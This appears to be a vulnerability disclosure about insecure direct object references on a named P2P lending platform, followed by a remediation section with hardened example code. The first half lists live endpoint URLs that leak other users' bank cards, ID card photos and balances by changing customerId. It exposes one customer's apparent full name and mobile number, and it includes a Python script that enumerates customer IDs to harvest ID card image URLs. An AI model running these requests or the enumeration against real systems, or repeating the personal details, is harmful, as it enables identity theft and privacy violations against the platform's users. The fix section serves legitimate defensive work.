Security matters on a P2P lending platform: a single real vulnerability can leak a large amount of user information (bank card number, phone number, ID card photo, account balance, etc.). Every endpoint below takes a customerId parameter and returns another user's data when that value is changed (an insecure direct object reference), so the whole user base can be enumerated.
Now that all of this information is exposed, is withdrawal still the only problem?
The value 14051005 should be the user ID used in the requests below.
#1. Bank card number query
Enumerate the customerId parameter:
https://yizhenmoney.com:9003/esb/account/customer/bankInfo/list?customerId=14051005&
#2. ID card photo traversal
The image file names themselves are hard to enumerate directly, since the last path component looks like a timestamp: http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg
However, you only need to enumerate the user ID to get the image URLs back from the API. I used Burp Suite to extract them.
# Enumerate customerId against the cardInfo/audit endpoint:
https://yizhenmoney.com:9003/esb/account/customer/cardInfo/audit?customerId=14051005&
This is the response after access:
{ "success" : true, "message" : "", "attr" : { "customerInfo" : { "name" : null, "cardId" : null, "foreUrl" : "", "foreThumbUrl" : "", "backUrl" : "", "backThumbUrl" : "", "handUrl" : "", "handThumbUrl" : "", "status" : "" }, "cardList" : [ { "id" : 14098725, "customerId" : 14051005, "optSource" : null, "autid" : 0, "type" : "00150001", "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg", "subFilePath" : null, "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg", "status" : "00210001", "version" : null, "createDate" : null, "creatorId" : null, "modifyDate" : null, "modifyerId" : null, "remark" : null }, { "id" : 14098726, "customerId" : 14051005, "optSource" : null, "autid" : 0, "type" : "00150002", "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg", "subFilePath" : null, "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg", "status" : "00210001", "version" : null, "createDate" : null, "creatorId" : null, "modifyDate" : null, "modifyerId" : null, "remark" : null }, { "id" : 14098727, "customerId" : 14051005, "optSource" : null, "autid" : 0, "type" : "00150003", "storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg", "subFilePath" : null, "filePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg", "status" : "00210001", "version" : null, "createDate" : null, "creatorId" : null, "modifyDate" : null, "modifyerId" : null, "remark" : null } ] }}
Another user's ID card photo, obtained the same way with customerId 14033105:
http://140.207.169.83:8000/upload/attachment5/14033105/00150001/1432291395569.jpg
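The enumeration step described above, written out as an added example (this is not code from the original report or from the platform): walk a range of customerId values, parse each cardInfo/audit response and collect the ID card image URLs it exposes. The sample response for 14051005 is a trimmed copy of the JSON shown in the report; the response for 14051006 and the "not found" body are constructed, and the `fetch` callable is a stub standing in for the HTTP request so the code runs offline.

```python
import json
import re
from typing import Callable, Dict, Iterable, List

# Trimmed copy of the cardInfo/audit response in the report (customerId 14051005),
# plus a constructed response for a customer with no uploaded ID card images.
SAMPLE_RESPONSES: Dict[int, str] = {
    14051005: json.dumps({
        "success": True, "message": "",
        "attr": {"cardList": [
            {"id": 14098725, "customerId": 14051005, "type": "00150001",
             "filePath": "http://140.207.169.83:8000/upload/attachment5/14051005/00150001/1432363081128.jpg"},
            {"id": 14098726, "customerId": 14051005, "type": "00150002",
             "filePath": "http://140.207.169.83:8000/upload/attachment5/14051005/00150002/1432363081156.jpg"},
            {"id": 14098727, "customerId": 14051005, "type": "00150003",
             "filePath": "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg"},
        ]},
    }),
    14051006: json.dumps({"success": True, "message": "", "attr": {"cardList": []}}),  # constructed
}

IMAGE_URL = re.compile(r"^https?://[^\s\"']+\.(?:jpg|jpeg|png)$", re.IGNORECASE)


def extract_image_urls(body: str) -> List[str]:
    """Return the ID card image URLs found in one cardInfo/audit response.

    Malformed JSON, success=false and missing keys all yield [] so that a
    single odd response does not abort a sweep over many IDs.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, dict) or not data.get("success"):
        return []
    urls: List[str] = []
    for card in (data.get("attr") or {}).get("cardList") or []:
        # The real response repeats the URL under storePath and filePath; dedupe.
        for key in ("filePath", "storePath"):
            url = card.get(key)
            if isinstance(url, str) and IMAGE_URL.match(url) and url not in urls:
                urls.append(url)
    return urls


def enumerate_card_images(customer_ids: Iterable[int],
                          fetch: Callable[[int], str]) -> Dict[int, List[str]]:
    """Query every customerId in the range and keep those that expose images.

    `fetch` is injected: here an offline stub, in an authorised test it would
    perform GET /esb/account/customer/cardInfo/audit?customerId=<cid>.
    """
    found: Dict[int, List[str]] = {}
    for cid in customer_ids:
        urls = extract_image_urls(fetch(cid))
        if urls:
            found[cid] = urls
    return found


def offline_fetch(cid: int) -> str:
    """Stub for the HTTP request; unknown IDs get a constructed failure body."""
    return SAMPLE_RESPONSES.get(cid, json.dumps({"success": False, "message": "not found"}))


if __name__ == "__main__":
    for cid, urls in enumerate_card_images(range(14051005, 14051008), offline_fetch).items():
        print(cid, *urls, sep="\n  ")
```

Because the image host (140.207.169.83:8000) serves the files without any authentication, the list produced here is everything an attacker needs; the timestamp in the file name provides no protection once the API hands the full path back.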
#3. Balance query
https://yizhenmoney.com:9003/esb/fortune/customer/accountinfo?customerId=14087605&
# The response also returns the user's name and mobile number; the credAmount field shows 2800
{"success": true, "message": "", "attr": {"customerAccVo": {"customerId": "14087605", "mobile": "13372530130", "cnName": "Cao jinfu", "recomCode": "w5dhx2", "status": "0", "avlBal": 0.0, "credAmount": 2800.0, "currPay": 0.0, "fortuneAmount": 0.0, "currProfit": 0.0, "redNum": 0, "recomProfits": 0.0, "withdrawStatus": "0", "myRecomPerson": null, "allNotRepayAmt": 0.0}, "surplusLuckNum": 0, "unReadMsgCount": 1}}
Solution:
Filter every request by the logged-in user: the server must take the customer ID from the authenticated session (or verify that the requested customerId belongs to that session) instead of trusting the customerId parameter sent by the client, and must apply the same check to the image host so that uploaded ID card photos are not served without authentication.
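As an added example (not the platform's code, whose server side is not visible in the report), the vulnerable pattern beside a hardened handler for the accountinfo endpoint. The handler shape, the `Session` object and the in-memory account table are assumptions made for illustration, and the names and phone numbers in it are constructed placeholders, not the real records from the report.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Constructed stand-in for the customer table (placeholder names and numbers).
ACCOUNTS: Dict[int, dict] = {
    14051005: {"customerId": 14051005, "cnName": "Customer A", "mobile": "13800000000", "credAmount": 2800.0},
    14087605: {"customerId": 14087605, "cnName": "Customer B", "mobile": "13900000000", "credAmount": 500.0},
}

Response = Tuple[int, dict]


@dataclass(frozen=True)
class Session:
    """Hypothetical server-side session, populated at login; the client never sets customer_id."""
    customer_id: int


def vulnerable_account_info(session: Optional[Session], params: Dict[str, str]) -> Response:
    """The pattern behind the report: the customerId query parameter is used as-is,
    so any logged-in (or even anonymous) caller can read any customer's record."""
    try:
        cid = int(params.get("customerId", ""))
    except ValueError:
        return 400, {"success": False, "message": "bad customerId"}
    acc = ACCOUNTS.get(cid)
    if acc is None:
        return 404, {"success": False, "message": "not found"}
    return 200, {"success": True, "attr": {"customerAccVo": acc}}


def mask_mobile(mobile: str) -> str:
    """Show only the first 3 and last 4 digits; the full number is not needed by the UI."""
    return mobile[:3] + "*" * (len(mobile) - 7) + mobile[-4:] if len(mobile) > 7 else "*" * len(mobile)


def fixed_account_info(session: Optional[Session], params: Dict[str, str]) -> Response:
    """Ownership is enforced server-side: the record returned is always the session
    user's own, and a mismatching customerId is rejected (and worth alerting on)."""
    if session is None:
        return 401, {"success": False, "message": "login required"}
    requested = params.get("customerId")
    if requested is not None:
        try:
            if int(requested) != session.customer_id:
                # A client asking for someone else's ID is exactly the enumeration
                # seen in the report; deny and log rather than silently serve own data.
                return 403, {"success": False, "message": "forbidden"}
        except ValueError:
            return 400, {"success": False, "message": "bad customerId"}
    acc = ACCOUNTS.get(session.customer_id)
    if acc is None:
        return 404, {"success": False, "message": "not found"}
    # Data minimisation: return the masked number, not the raw PII.
    safe = dict(acc, mobile=mask_mobile(acc["mobile"]))
    return 200, {"success": True, "attr": {"customerAccVo": safe}}


if __name__ == "__main__":
    me = Session(customer_id=14051005)
    print("vulnerable:", vulnerable_account_info(me, {"customerId": "14087605"}))
    print("fixed:     ", fixed_account_info(me, {"customerId": "14087605"}))
    print("fixed own: ", fixed_account_info(me, {}))
```

The same rule applies to bankInfo/list and cardInfo/audit, and to the image host: a URL under /upload/attachment5/<customerId>/ should only be served after the same ownership check, since the JSON fix alone still leaves every photo retrievable by anyone who knows the path.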